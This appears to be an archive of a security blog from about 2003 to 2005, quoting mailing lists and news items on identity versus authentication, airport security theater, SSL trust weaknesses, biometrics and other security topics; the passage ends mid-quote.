• SSN: Identifies you, does not prove your identity. This is a claimed identity on its own.
• Credit/debit Card Number: Identifies your credit card account, does not prove your identity. Possession or presentment does not prove that the presenter of this information is authorized to make use of it. But that doesn't stop the financial industry from using it as the payment authenticator...
• ACH/Bank account and routing numbers: Identifies your bank account (along with the type, checking or savings). Again, possession or presentment does not prove that the presenter of this information is authorized to make use of it. Realize that you give this out to everyone and anyone if you send out checks since all the information to transfer money in or out of your account is right there on the check.
• ITIN: From the IRS website:

  Are ITINs valid for identification? No. ITINs are not valid identification outside the tax system. Since ITINs are strictly for tax processing, IRS does not apply the same standards as agencies that provide genuine identity certification. ITIN applicants are not required to apply in person, and IRS does not further validate the authenticity of identity documents. ITINs do not prove identity outside the tax system, and should not be offered or accepted as identification for non-tax purposes.

So, because of this mess, you need to know how to protect yourself. Know your rights about bank account fraud.

Perry Metzger's posting to the cryptography mailing list recently about the problems of financial fraud were spot on:

John Denker writes: > My point here is that knowing who I am shouldn't be a > crime, nor should it contribute to enabling any crime. > Suppose you know who I am. Suppose you know my date of > birth, social security number, and great-great-grandmother's > maiden name. As Spike said, so what?

I tend to agree. It is equally ridiculous to use a credit card account
number as the "secret" to authorize a transaction, since that "secret"
has to be given out several times a day.

> It's only a problem if somebody uses that _identifying_
> information to spoof the _authorization_ for some
> transaction.

Yes.

> And that is precisely where the problem lies. Any
> system that lets _identification_ serve as _authorization_
> is so incredibly broken that it is hard to even discuss
> it. I don't know whether to laugh or cry.

Again, yes.

However, I would like to make one small subtle point. In fact, what
you are complaining about is not the use of identification for
authorization -- that is a totally separate and equally sad discussion
-- but the use of widely known pieces of information about
someone to identify them. The issue is that the bank pretends only you
would know your mother's maiden name, not that the bank would only let
you withdraw funds. A piece of information that is not widely known
but which can be used to establish your identity -- such as a private
key only you should know -- is probably fine.

So, rephrasing, the problem is not that secret information isn't a
fine way to establish trust -- it is the pretense that SSNs, your
mom's birth name or even credit card numbers can be kept secret.

> Identifying information cannot be kept secret.

I'd amend that to "things like your name, your SSN or your account
numbers cannot be kept secret..."

> There's no point in trying to keep it secret. Getting a new SSN
> because the old one is no longer secret is like bleeding with
> leeches to cure scurvy ... it's completely the wrong approach. The
> only thing that makes any sense is to make sure that all relevant
> systems recognize the difference between identification and
> authorization.

I have to agree yet again (with my caveats about the terminology you
are using).

This is yet more reason why I propose that you authorize transactions
with public keys and not with the use of identity information. The
identity information is widely available and passes through too many
hands to be considered "secret" in any way, but a key on a token never
will pass through anyone's hands under ordinary circumstances.

Perry

First out of the gate:

Fedex sued a loyal customer for posting photos of furniture he made for himself out of Fedex boxes on the web. Get this, they used many...er...novel...legal arguments to try to scare him. Welcome to the doghouse FedEx. You've got great company, such as Cisco and Oracle.

Some highlights:

• They tried to use the DMCA in their claims. But were complaining about trademark issues. Copyright law does not cover trademarks. Next!
• They tried to make some claim that he was violating the terms of service of fedex.com in his use of the boxes.
• They tried to claim that he was obviously posting the photos for personal financial gain. Get this--because he posted them to a .com website instead of a .net. Good thing I'm on a .net so they can't sue me!

Furniture Causes FedEx Fits

Also in the WTF files. A Doonesbury strip was recently pulled for using a real, albeit crude, nickname for Karl Rove. The papers claimed it was "in bad taste".

Some pull 'Doonesbury' over Rove moniker

The strip itself:
http://www.doonesbury.com/strip/dailydose/index.html?uc_full_date=20050726

Next on the list. Jason Coombs had a great rant on Bugtraq about computer forensics professionals who are testifying against defendants who may well have a legitimate defense -- the "the trojan ate my homework" defense. He takes issue with claims that a forensics investigation could reasonably ascertain whether a past action was performed by a human or a trojan horse or other malware:

The fact that malware authors aren't cooperating with the computer forensics industry by making sure that it's easy to distinguish between the actions of malware and the actions of a human computer user, combined with uninformed expert opinions like those shown below, is resulting in innocent people being put behind bars, and people like Marcus Lawson who think they know what they're doing but clearly do not are helping to get innocent people convicted by spewing nonsense. This undermines the ability of the criminal court system to convict those who are truly guilty, and keep them convicted on appeal.

And finally, How many laws do you have to break to get fired in the Department of Homeland Security? Since this ran, we now know that the DHS has now deleted the data that they illegally obtained from data miners. So now, americans have no way of knowing if the TSA had used data about them illegally. A group from Alaska is suing the government now.

This will be something to look forward to. I have not seen much of the theory of threat modeling end-to-end put into practice effectively or completely. And much of what I have seen of threat modeling really should be baked into the SDLC process and something that project teams do as part of normal development efforts (why are security people doing separate data flow diagrams, for example?).

From Threatsandcountermeasures:

The next release of the OWASP Web Application Penetration Test (WAPT) guide will include a section on using threat modelling effectively

Threat Modelling and security testing

That sounds like quite a deal actually. Verisign still charges an exhorbitant amount of money for bits that do the same thing.

-Jason

From Peter Gutman to the Cryptography Mailing list Subject: How much for a DoD X.509 certificate?

$25 and a bit of marijuana, apparently. See:

http://www.wjla.com/news/stories/0305/210558.html
http://www.wjla.com/news/stories/0105/200474.html

Although the story doesn't mention this, the "ID" in question was the
DoD Common Access Card, a smart card containing a DoD-issued
certificate. To get a CAC, you normally have to provide two forms of
verification... in this case I guess the two were photo ID of dead
presidents and empirical proof that you know how to buy weed.

The cards were issued by Yusuf Khalil Jackson, a man with a long
criminal history (including, ironically, identity fraud):

John Pike, Global Security.org: "The notion that we're going to let
somebody with this type of criminal record, with no background check
on him
and give him the ID card machine defies understanding."

Jackson admitted to making about 30 of the ID cards:

John Pike: "The good news is that it looks like some of these people
were
just doing it so they could go to a bar and claim to be over 21. The
bad
news is that you don't know what else some of these other people might
have
done."

One of the cards was later "seized from a Pakistani national" by the
police.

Bowens: "That's the nightmare of it. The cards themselves are not
counterfeit. They're authentically made but they've been issued in an
unauthorized manner for profit or ideology or a little of both."

This sort of thing doesn't bode well for Real ID either. These cards
were real ID too.

Peter.

Getting smarter:

Chertoff is a good guy. When I heard this NPR interview I remember thinking, holy crap, someone who gets it. Security is about tradeoffs and with limited resources, making the most cost effective and rational decisions based on risk and threat analysis.

TSA may move to reallow knives, etc. back on aircraft.
Threats Reassessed To Make Travel Easier for Public

The stay-seated the first and last 30-minutes of a flight rule is also going away, due to reasoned analysis:
http://www.mail-archive.com/infowarrior@g2-forward.org/msg01084.html

Staying stupid:

(proposing requiring passports to enter the US from Canada)

http://www.mail-archive.com/infowarrior@g2-forward.org/msg01280.html

Looks like getting smarter may finally win out.

Non-English Domain Names Likely Delayed - Yahoo! News

Social engineering attacks using similar characters to trick users are called homograph, or semantic attacks Also see this article on IDN Homograph Attacks.

Concerns about "phishing" e-mail scams will likely delay the expansion of domain names beyond non-English characters, the chairman of the Internet's key oversight agency said Friday.

Vint Cerf, head of the Internet Corporation for Assigned Names and Numbers, would not speculate on when such characters might appear but said Internet engineers must now spend time "trying to winnow down, frankly, the number of character (sets) that are allowed to be registered."

"In some of the early tests, ... it became clear we had opened up the opportunity for registering very misleading names," Cerf said in a conference call wrapping up ICANN's meetings this week in Luxembourg. "This kind of potential confusion leads to parties going to what they think are valid Web sites."

Back in February of this year, the ICANN announced a request for Public Comment on issues with the proposed Internationalized Domain Name (IDN) standard and recognized homograph attacks as a likely attack vector.

CNN.com - Cell phone service disabled in New York tunnels - Jul 12, 2005

Cell phone service was disabled inside the four tunnels leading into Manhattan after the terrorist bombings in London, but Mayor Michael Bloomberg questioned Monday whether the move "makes the most sense."

I'm with Mayor Bloomberg. I don't think it makes sense at all for at least four major reasons:

1. Terrorists don't necessarily have to call a cellphone in order to use it to detonate a bomb. I have read about them using the built-in timer. And this article actually corroborates this.

   In the Madrid explosions, alarms in cells phones were set on vibration, which sent electric impulses to the copper detonators connected to the explosives, Spanish authorities said.

   So, this measure indicates that someone does not understand the threat.
2. More importantly, suppressing cellular service only can serve to incite panic--especially if there were to be another bombing or similar terrorist attack. I remember on 9/11 how distracted and distraught everyone was who knew people from New York when they could not get through to anyone to make sure everyone was alright. Now, if that isn't terrorism, I don't know what is. So, shutting down cell phone service really is going to help the terrorists with their mission
3. Cellphones on the front lines can be a great help in reporting attacks. Faster reporting and more accurate directions to authorities can save lives if there were to be another attack.
4. The Department of Homeland Security said that this goes against their guidelines of keeping the cellphone system up and working for rescue authorities to use in the event of an emergency

   The Department of Homeland Security said the decision in New York to cut off cellular service was made without any recommendation by the federal government's National Communications System, which ensures communications are available during national emergencies.

And while we're on the subject of anti-terrorist governmental reactions that don't make any sense... (Bruce Schneier is really going to have a field day with these):

PCWorld.com - Feds Seek Wiretap Access for Mobile Calls on Planes

If cell phones and other handheld wireless devices are allowed to be used on aircraft by the U.S. Federal Communications Commission, the U.S. Department of Justice wants built-in terrorism-fighting capabilities to allow fast wiretaps and quick ways to disconnect conversations between terrorists.

This appeared in the October 2004 crypto-gram and is a very good description of how the current "security" measures at airports, etc. serve only to "reduce fear" and don't actually "increase security". The latter is the hard problem....

From: Anonymous
Subject: Fear and Security

This is in response to the letter you published last month by Wayne
Schroeder: Fear and security are closely coupled in simple situations, like riding a motorcycle. The way to reduce the fear is to increase your safety, such as by driving more slowly. Millions of years of evolution have evolved fear as a mechanism for keeping us alive, but millions of years of evolution never had to deal with a 767. It evolved for simpler things, like bad weather, high speeds, and scary animals.

When it comes to the more complex security situations of the modern
world, our natural instincts are inadequate. People still rely on them to guide them, though, like in the now-notorious Annie Jacobsen
freakout. That's why we have security theater; people are trying to
reduce fear, not increase safety, and they don't realize those aren't
the same anymore.

That is also why people are reluctant to confront their poor choices.
When you force them to do so, you are taking them from a place of
reduced fear to one of heightened fear; as far as they're concerned,
you're causing the fear. The rational perspective is clearly that you
are making them safer, but they don't see it that way.

The motorcycle example just doesn't work because it maps easily to our
evolved instincts. Modern security problems are so complicated that
the ways to reduce fear have diverged from the ways to increase safety. Trying to map these primitive emotions to modern threats can't work; the gap is too large. Relying on our fears to guide us won't make us safer; it will only make it more shocking when our defenses are breached again.

Good to look back on in light of the raising of the alert (and only for public transportation...) Is the best our intelligence can do is to assume that the next attack will be the same MO and style as recent ones?

Schneier on Security: Do Terror Alerts Work?

When Attorney General John Ashcroft came to Minnesota recently, he said the fact that there had been no terrorist attacks in America in the three years since September 11th was proof that the Bush administration's anti-terrorist policies were working. I thought: There were no terrorist attacks in America in the three years before September 11th, and we didn't have any terror alerts. What does that prove?

Mark Curphey's Blog

I am very methodical when it comes to security design and security reviews so I am sure that these templates will come in very handy to ensure uniform coverage of requirements and mechanisms.

My only quibble so far is that they call this "SecureUML". The UML isn't Secure, nor is having a well-defined Authorization model imply security (look no further than the Sarbanes-Oxley efforts that define wonderful processes and models, but the auditor testing never covers the effectiveness of the underlying mechanisms implementing these controls...)

There are a few simple steps that can help when defining authorization requirements and an extension to the Unified Modeling Language called SecureUML that is very powerful for documenting unambiguous authorization models, specifically RBAC (roles based access control). My colleague Rudolph Araujo (Security Developer MVP) has built a Visio template for creating SecureUML models that is also available here. One of the things I specifically like about UML and SecureUML is that it forces you to really think about things and promotes best practice where you are not operating on undocumented assumptions. First things first, lets define some simple steps to creating an authorization model.

1. Identify Users (actors)
2. Identify Application Specific Roles
3. Map Users to Roles Based on Business Function
4. Identify Resources
5. Identify Actions
6. Identify Authorizations Constraints

Foundstone, Inc.� Strategic Security

Have not checked it out yet. Sounds promising. Although it would be nice to have a scanning tool that can do application security checks regardless of the protocol being HTML over HTTP, XML over HTTP, SOAP, etc. Many of the attacks and scanning signatures will be the same. Only the formatting and perhaps the detection of success/fail of a test. I'd be interested in knowing more about what they encountered as to whether the differences are significant enough to warrant a separate tool.

SSL Organization Vulnerabilities

The following example web site spoofs demonstrate the vulnerabilities that exist if First-Generation vetting practices for digital certificates are used in combination with new browser enhancements which bring the certificate Organizational information forward and displayed next to the SSL Lock symbol.

Spoofers these days are adapting very fast to new technology to counter their tactics. This is one in which adversaries are generating certificates with Organization information that matches a target site to spoof, and dumb "Trusted" third party CAs happily sign these certificates. Some browsers, such as Opera, are now providing the organization information directly to users to help them make better trust decisions. Unfortunately, this is rearranging deck chairs on the Titanic since the SSL TTP model is totally broken--it does not allow for adequate authentication of sites to end users, hence the rampant phishing attacks and soon to be man-in-the-middle attacks (my prediction).

Fear of Spyware Changing Online Habits - Yahoo! News

Internet users worried about spyware and adware are shunning specific Web sites, avoiding file-sharing networks, even switching browsers. ADVERTISEMENT

Many have also stopped opening e-mail attachments without first making sure they are safe, the Pew Internet and American Life Project said in a study issued Wednesday.

Some good indications that end users are gaining levels of awareness of the security problems in today's Internet environment. Go read the full report It has a lot more meat than the wire stories.

Following up on my earlier posting on TSA idiocy... Supposedly this was also at SeaTac.

Just met with some friends tonight and the subject of airline/airport "security" came up. A true story about a recent run-in with TSA:

85-year-old resident of Washington state arrives home after an international flight where he had successfully taken about six different flight legs without incident carrying on a small watch/clock repair toolkit with him in his carry-on luggage. On the final leg, he is accosted by TSA because he is carrying a 2 inch hammer in this kit with a metal head and wooden handle!! The TSA tells him that tools are prohibited and that they are going to confiscate this tiny hammer.

Well, they pleaded with TSA:

• The man is 85 years old and lives in Seattle
• Oh, by the way, he had no problems on the other six legs of our flight and this is the final leg.
• He had made the hammer himself with his own hands years ago--both the handle and the metal head. It is a one-of-a-kind and a cherished family heirloom.
• Are terrorists (or _anyone_) known to attack people with 2 inch hammers?

But, the TSA, protecting all of us from 2 inch hammer banditos, refused to budge. The family got several levels of TSA and airport staff involved to press the issue yet their pleas still fell on deaf ears.

To make matters worse, the TSA staff were nasty about the situation too. For example, when asked what they were going to do with the hammer after confiscating it, they said that it would be "discarded", as if it were something with only utilitarian value. No thought about the real human lives in front of them that were being negatively impacted by this policy. I guess "things have changed after 9-11":   Americans are self-righteous and don't care about the American public? No thought is expended to question whether the TSA Policy that does actually prohibit bringing quote-unquote "hammers" on board, but I'm sure the policy writers did not intend for this to apply to 2 inch hammers! Think people!! Sheesh.

Yeah, people supposedly trying to protect us are maliciously obedient to policies that address false risks not based on a threat model, let alone a reasonable one. And, they only care about the letter of the law and not the spirit. The risk mitigation lies in the spirit of the law. Stupidity and a police state lies in strict interpretation of the letter of the law, especially in the case of the TSA where Americans have no ability to confront their accusors and ensure any sense of just treatment under the law.

A great quote I have heard someone say (about "no tolerance" school gun/knife/drug/etc. policies) is that "no tolerance" polices like these are really "no thought" policies. They allow people to be maliciously obedient to idiotic policies and take away any hint of a rational thought process that would normally prevent humans (formerly known to be rational actors) from arriving at ridiculous conclusions to benign situations.

A great paper to read up on, especially given that Phishing is showing us that the "Trusted Third Party" model as implemented in today's web browsers is horribly broken.

Don Davis' Cryptography Articles. Specifically, read "Compliance Defects in Public-Key Cryptography".

Abstract:
Public-key cryptography has low infrastructural overhead because public-key users bear a substantial but hidden administrative burden. A public-key security system trusts its users to validate each others' public keys rigorously and to manage their own private keys securely. Both tasks are hard to do well, but public-key security systems lack a centralized infrastructure for enforcing users' discipline. A "compliance defect" in a cryptosystem is such a rule of operation that is both difficult to follow and unenforceable. This paper presents five compliance defects that are inherent in public-key cryptography; these defects make public-key cryptography more suitable for server-to-server security than for desktop applications.

The slides (78 Kbytes) PDF (78 Kbytes) discuss a topic that the paper only touches upon: the complexity of thoroughly checking a certificate issuance-chain, to see whether any of the certs in the chain have been revoked recently. Even in the best case, this is a surprisingly messy procedure. See slides 12 & 13, and their annotations.

Best quote:

"Whenever someone thinks that they can replace SSL/SSH with something
much better that they designed this morning over coffee, their computer
speakers should generate some sort of penis-shaped sound wave and plunge it repeatedly into their skulls until they achieve enlightenment."

-- Peter Gutman, http://mail-archive.com/cryptography@metzdowd.com/msg00891.html

The rest of the post is great as well, with a "sound" warning about the CIPE VPN.

This is a true story!

The link to the story below is stale now, but this one still works:

Hackers tell man he's "too fat" to eat at Burger King - silicon.com

http://www.ananova.com/news/story/sm_853744.html?menu=news.latestheadlines

Burger King customers told: 'You are too fat to have a Whopper'

Police believe teenage pranksters are hacking into the wireless frequency of a US Burger King drive-through speaker to tell potential customers they are too fat for fast food.

Policeman Gerry Scherlink said the pranksters told one customer who had just placed an order: "You don't need a couple of Whoppers. You are too fat. Pull ahead."

The offenders are reportedly tapping into the wireless frequency at the restaurant in Troy, Michigan. Police believe the culprits are watching and broadcasting from close range.

Officer Scherlinck said the men are telling customers who order a Coca-Cola that, "We don't have Coke." And when the customer asks what they do have, the hacker would say: "We don't have anything. Pull ahead."

But what has managers concerned is the profanity the hackers are using, according to police.

A drive-through customer has told police if he had children with him in the car and someone used profanity, he would have been upset.

Burger King franchise owner Tony Versace issued the following statement in response to the incidents: "We apologise to our customers who've been insulted by the use of this drive-through speaker."

Management at the fast-food restaurant are reportedly trying to change the radio frequency used for the speakers, reports Local 4.

This story from my hometown of Seattle is further proof that the current airport security procedures are nothing more than window dressing and are leading to the loss of civil rights for innocent people.

When was the last time you heard about these security procedures actually catching a terrorist?

komo news | 'This Is Not Right'

DES MOINES - Cecilia Beaman is a 57-year-old grandmother, a principal at Pacific Middle School in Des Moines, and as of Sunday is also a suspected terrorist.

"This is not right," she told us. It's not right!"

During the stay she made sandwiches for the kids and was careful to pack the knives she used to prepare those sandwiches in her checked luggage. She says she even alerted security screeners that the knives were in her checked bags and they told her that was OK.

But Beaman says she couldn't find a third knife. It was a 5 1/2 inch bread knife with a rounded tip and a serrated edge. She thought she might have lost or misplaced it during the trip.

On the trip home, screeners with the Transportation Security Administration at Los Angeles International Airport found it deep in the outside pocket of a carry-on cooler. Beaman apologized and told them it was a mistake.

"You've committed a felony," Beaman says a security screener announced. "And you're considered a terrorist."

Beaman says she was told her name would go on a terrorist watch-list and that she would have to pay a $500 fine.

And to make it worse, you are guilty without the ability to confront your accuser and clear your name

She says screeners refused to give her paperwork or documentation of her violation, documentation of the pending fine, or a copy of the photograph of the knife.

"They said 'no' and they said it's a national security issue. And I said what about my constitutional rights? And they said 'not at this point ... you don't have any'."

AT&T plans CNN-style security channel

Security experts at AT&T are about to take a page from CNN's playbook. Within the next year they plan to begin delivering a video streaming service that will carry Internet security news 24/7, according to the executive in charge of AT&T Labs.

The service, which currently goes by the codename Internet Security News Network, (ISN) is under development at AT&T Labs, but it will be offered as an additional service to the company's customers within the next nine to 12 months, according to Hossein Eslambolchi, president of AT&T�s Global Networking Technology Services and AT&T Labs

ISN will look very much like Time Warner's Cable News Network, except that it will be broadcast exclusively over the Internet, Eslambolchi said. "It's like CNN," he said. "When a new attack is spotted, we'll be able to offer constant updates, monitoring, and advice."

Given the kinds of horrible "sky is falling" coverage on mainstream media of security items in the past, perhaps this can help raise the bar?

Bogus analysis led to terror alert in Dec. 2003 - Lisa Myers & the NBC Investigative Unit - MSNBC.com

WASHINGTON - Christmas 2003 became a season of terror after the federal government raised the terror alert level from yellow to orange, grimly citing credible intelligence of another assault on the United States.

"These credible sources," announced then-Secretary of Homeland Security
Tom Ridge, "suggest the possibility of attacks against the homeland
around the holiday season and beyond."

For weeks, America was on edge as security operations went into high
gear. Almost 30 international flights were canceled, inconveniencing
passengers flying Air France, British Air, Continental and Aero Mexico.

But senior U.S. officials now tell NBC News that the key piece of
information that triggered the holiday alert was a bizarre CIA analysis,
which turned out to be all wrong.

CIA analysts mistakenly thought they'd discovered a mother lode of
secret al-Qaida messages. They thought they had found secret messages on
Al-Jazeera, the Arabic-language television news channel, hidden in the
moving text at the bottom of the screen, known as the "crawl,"
where news headlines are summarized.

And the critics come out:

"I'm astonished," says author and intelligence expert Jim Bamford, "that they would put so much credibility in such a weak source of intelligence."

Bamford says the CIA shouldn't be criticized for considering the theory,
but that analysts should have weighed how implausible it was.

"What you have to do is judge the intelligence versus what your actions
are going to be. And this is the equivalent, basically, of looking at
tea leaves," Bamford says.

I find it very interesting that steganography was the cause for raising the alert level. The article says the messages were supposedly found "in the moving text" in the "crawl", which would seem to implicate Al-Jazeera in communicating secret messages from terrorits since they control the crawl and would presumably have authored the content. The only way they wouldn't be implicated would be if they were to have been scrolling direct quotes from terrorists.

But is the "intelligence" applied to the "steganographic data" (flight numbers, etc.) that was "found" simply masking the fact that the CIA is resorting to numerology? Mining arbitrary data for significance where there is none, ala The Bible Code? The reference to reading "tea leaves" above is apropos...

What I'm also curious about is who leaked the information about why we raised the terror alert level? You would think that would be a national security secret--even now. Makes both the CIA and the decision makers in Homeland security look like idiots to put this information out there.

"It is better to keep your mouth closed and let people think you are a fool than to open it and remove all doubt" --Mark Twain

Chris Hill's biometrics thesis:

This is a very interesting development. It challenges a key assumption that people have made about biometrics:

"that stored biometrics pose no threat to their owner (if they are stolen by another party), because it is not possible to recreate the original biometric from the stored data."

So, attackers can potentially bypass biometric systems in a couple of ways if they can compromise digital representations of biometric data (from storage or by sniffing, e.g. USB sniffer or keyboard sniffer): They can recreate new physical biometrics that will have properties indistinguishable from the original.

"I demonstrated that it is possible to recreate a biometric artefact that is equivalent to the original biometric provided to the system. This means that while a third party will not be able to generate the original biometric, they will be able to generate something that is indistinguishable from it, as far as the biometric software is concerned."

Adam Shostack also had some additional comments on this today, pointing out the privacy implications of such a breach:

The answer is you can reconstruct fingerprints from common systems.

Daniel David Walker referred me to some work by Andy Adler, who pointed
out Ross, Shah and Jain, "Towards Reconstructing Fingerprints from
Minutiae Points."[1]

[1] http://www.csee.wvu.edu/~ross/pubs/RossReconstruct_SPIE05.pdf

Some additional tidbits are on my blog at
http://www.emergentchaos.com/archives/001443.html

Imagine lost biometric passports allowing the creation of counterfeit passports with "real" biometric data on them. And further imagine trying to prove that it wasn't you who bombed that plane in Lebanon. "But we logged you going through security...and biometrics are _unique_ and _unforgeable_". *Shiver*

Slashdot | Washington State Outlaws Spyware

the Governor of Washington signs a a bill outlawing spyware (bill history) which imposes penalties of $100,000 per violation.

This is a step in the right direction. I am not sure if it will be effective due to jurisdictional and technological issues with tracking, identifying, and prosecuting purveyors of spyware. The anti-spam legislation in the state and federal laws has not exactly dramatically curbed spam. But this clarification of the computer crime statutes is helpful to avoid ambiguity.

Also of interest to me now is that Washington also passed an anti-phishing law.

Ohio Agents Use Woman's Identity in Strip-Bar Sting: Internal Affairs at Officer.com

This is absolutely unbelievable! Imagine if the state was to damage your reputation or financial status (e.g. FICO score or credit worthiness) due to the unauthorized use of your identity!

Nasal said the ploy was legal because a change in Ohio's law the previous year aimed at curbing identity theft. The law allows police to use a person's identity within the context of an investigation, he said.

The problem of identity theft is the persistent lack of decent capabilities in the financial industry to reliably authenticate claimed identities. I don't have a perfect solution, but continuing with the status quo of allowing people to just claim an identity (not prove it) and then trying to keep plugging fingers in the dike to keep this information "private" (_identifying_ information that is allowed to be used as _authenticating_ information) rather than implement a real authentication solution is solving the wrong problems. And they wonder why identity theft is increasing in double-digit percentages every year...

TheDenverChannel.com - Slideshow

The American public can rest easy now that these penguins have been rigorously vetted by the TSA. Someone managing the Terrorist Watch List must have recently seen one of the Batman movies. That was _just a movie_.

NISCC Vulnerability Advisory IPSEC - 004033

From what I have read on this, the flaw in ESP only will affect you if you are using ESP for confidentiality protection only (no integrity check in ESP) and are relying on other layers for integrity protection (e.g. AH or the application layer). I would never recommend you configure IPSec in this manner. Confidentiality protection without integrity protection in the same layer is not very useful IMHO. And it can be dangerous, as this flaw indicates.

Hyper-Threading considered harmful

This is an interesting case where a hardware flaw can be used to subvert software security.

I find it fun to ask vendors who create their own OS and processors for appliances how they ensure things such as memory page protection. I get a lot of blank stares. They often focus entirely on the macro-level security in their software and have spent little to no time addressing the basic hardware and OS-level security issues that are taken for granted by software authors.

The Washington Monthly

here's a question: do you think the Italian computer whizzes will be any more competent than their American counterparts when they release their report? The U.S. report is full of redactions, as you can see in the picture above, but once again an American agency has used the searchable PDF format to distribute a report, and all you have to do is save the report as a text file in order to recover all the redacted parts.

Carjackers swipe biometric Merc, plus owner's finger | The Register

Carjackers swipe biometric Merc, plus owner's finger By John Lettice Published Monday 4th April 2005 13:52 GMT

A Malaysian businessman has lost a finger to car thieves impatient to get around his Mercedes' fingerprint security system. Accountant K Kumaran, the BBC reports, had at first been forced to start the S-class Merc, but when the carjackers wanted to start it again without having him along, they chopped off the end of his index finger with a machete.

Okay, I knew this would happen someday and this is evidence that it finally happened. Biometrics ("something you are") should only be used as a convenient _IDENTIFICATION_ mechanism as a necessary, but not a sufficient condition for _AUTHENTICATION_ of users. This is why multi-factor authentication is still important with Biometrics so you couple the "something you are" with "something you know" or "something you have".

Additionally, you should be wary of biometric hardware that can often be trivially fooled or, as this one, are unable to adequately tell the difference between "live" and "dead" or "not-live" biometric data. Else, you could be risking more than your security: the well-being and safety of your users.

The Feds can own your WLAN too : TomsNetworking :

Also a slashdot discussion of this technique, which essentially cracks WEP implementations that are vulnerable to weak keys and uses some nice "features" of some APs to get the AP to send out additional encrypted packets to improve the speed of the attack. They can crack WEP in minutes. Pretty interesting...

Security no match for theater lovers

This article shows that for the promise of a $7-$10 movie ticket, you can trivially gather enough information about almost anyone to steal their identity. And this was at a security conference. I've seen a couple of other studies such as this with other low-value enticements work just as effectively.

Web Security Group Launches Northwest Chapter

Web Security Group Launches Northwest Chapter

The leading web application security organization, Open Web Application Security Project (OWASP), has opened a local chapter in Seattle.

I may be spending some time with this group. Glad to see more volunteer security orgs in the Seattle area! And glad to see some emphasis on application security, of course.

Their website is http://www.owasp.org/local/seattle.html

Be warned: the site looks atrocious in Firefox.

ICANN Email Archives: [net-rfp-verisign]

See also http://www.financialcryptography.com/mt/archives/000332.html

...Verisign also operates a 'Lawful Intercept' service called
NetDiscovery [2]. This service is provided to "... [assist]
government agencies with lawful interception and subpoena requests
for subscriber records [3]."

We believe that under such a service, VeriSign could be required
to issue false certificates, ones _unauthorised_ by the nominal
owner. Such certificates could be employed in an attack on the
user's traffic via the DNS services now under question. Further,
the design of the SSL browser system includes a 'root list' of
trusted issuers, and a breach of _any_ of these means that the
protection afforded by SSL can now be bypassed.

.....

The cryptographers and security architects who designed the SSL system in 1994 and 1995 envisaged the issuer of certificates to be _trusted by the certificate owner_. This development represents the antithesis of this security requirement.

ActForChange Petition: Stop the Florida-tion of the 2004 election

"Today, there is a new and real threat to voters, this time coming from touchscreen voting machines with no paper trails and the computerized purges of voter rolls.

Urge your friends to join SCLC President Martin Luther King III and investigative reporter Greg Palast in opposing the "Florida-tion of the 2004 Presidential election" by signing this petition."

Interesting paper on how to use memory errors to attack a virtual
computer. The attack exploits the fact that a "time of compilation"
check is not necessarily valid at "time of use."

This happens to be the theory behind the Java ByteCode verifier. I just heard Whit Diffie talk yesterday at SecureWorld Expo about how the run-time check of the bytecode is intended to validate that proper array bounds checking is going to be done, for example.

Monthly reports on security and non security-related items, such as analyzing SSL webserver usage, apache module usage. Very interesting. I like to see Apache having almost 80% of the market share now :-)

SecuritySpace

"99% of SSL users have no idea how SSL works and consequently make informed decisions"

Browser manufacturers try to make things easy for users but end up diluting the security properties of the hierarchical trust model.

A lot of talk in recent years on the cryptography mailing list indicates that this model is too broken and perhaps should be replaced with an ad-hoc mechanism, such as the SSH model, with all web servers installing _some_ sort of certificate by default--even self-signed. The thoughts are that some confidentiality protection with reasonable MITM detection is better than so few sites supporting encryption since they don't want to pay Verisign blood money for a "real" certificate.

You'll notice on my site that I have always used my own cert. I should probably regenerate one that is not expired...

-----Original Message----- From: InfoSec News [mailto:isn@c4i.org] Sent: Monday, March 24, 2003 12:39 AM To: isn@attrition.org Subject: Re: [ISN] Is SSL safe?

Forwarded from: Kurt Seifried

None of this really matters because 99% of SSL users have no idea how
SSL works and consequently can't make informed decisions when faced
with attacks such as:

1) Older SSL clients that don't check certificate constraints, i.e.
CAN-2002-0828, CAN-2002-0862, CAN-2002-0970, CAN-2002-1183,
CAN-2002-1407 and so on. If you don't understand what this sentance
means you are potentially vulnerable. I have yet to see a GOOD plain
english description of this problem that my mother would understand.

2) Verifying certificates that are out of date or issued to the wrong
common name (i.e. hostname). This happens a lot, my web based banking
provider (one of the big 4 banks in Canada) used an out of date SSL
certificate for about a week last year. Perhaps an insider attack at
work, perhaps an innocent mistake, I never got an answer out of them.

3) Verifying that certificates are issued from a trusted provider.
Most common web based SSL clients (like Netscape, IE) have over 100
root certificates. Have you ever heard of "Certisign Certificadora
Digital Ltda." (doesn't expire until 2018) or "IPS SERVIDORES" (good
until 2009). It seems to me that an intelligent criminal could subvert
one of these small firms (hostile takeover, get employed there, etc.)
and then have a grand old time issuing certificates to themselves.

4) The eternal "who cares about SSL" argument, web servers and back
end infrastructure is so poorly secured that most times an attacker
can spend a week breaking in and get a few (tens, hundreds, etc.) of
thousands of credit cards with all the personal data in one fell
swoop. This applies less so against "secure" corporate/gov/mil/etc
infrastructure like SSL encrypted POP email, against which targeted
SSL attacks are useful (to gain a password to gain further access,
etc.).

5) All the old old stuff I covered in:

http://seifried.org/security/cryptography/20011108-end-of-ssl-ssh.html

and

http://seifried.org/security/cryptography/20011108-sslssh-followup.html

Which still largely applies. *SIGH*.

Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

A great (old) post to Risks 22.74 about the past issues with designing solutions to buffer overflows in hardware. Also, a link to a paper describing the history of these efforts that I'll be looking to check out.

Crispan was just spotted at SecureWorld Expo in Seattle today...

-Jason

----------------
Date: Sat, 10 May 2003 19:19:12 -0700
From: Crispin Cowan
Subject: Re: OpenBSD ... protects against buffer-overflow ... (Ardley, R
22.72)

>What is not so apparent is why technology that was developed and
>operating over 30 years ago is just being re-invented in software.

Because what was developed in operating systems over 30 years ago was
use of heavily segmented architectures. Over 20 years ago (the Intel
432) it was discovered (the hard way) that such architectures run
horribly slowly compared to RISC architectures. Since the debacle of the
432, even CISC processors such as the x86 have migrated towards RISC
style instruction processing.

What OpenBSD is implementing is a variety of software schemes to make up

for the lack of hardware protection for array bounds. Some of these
schemes (Openwall's non-executable stack) are
performance neutral: just mark the stack segment non-executable. Some
(ProPolice, a re-implementation of StackGuard
) are very cheap
, much cheaper than
enforcing memory safety in hardware.

Unfortunately, one of these enhancements (W^X) is not so cheap. Here,
they try to make all writable pages non-executable, and vice versa. This

is problematic on the x86 architecture because waaaay back in the day,
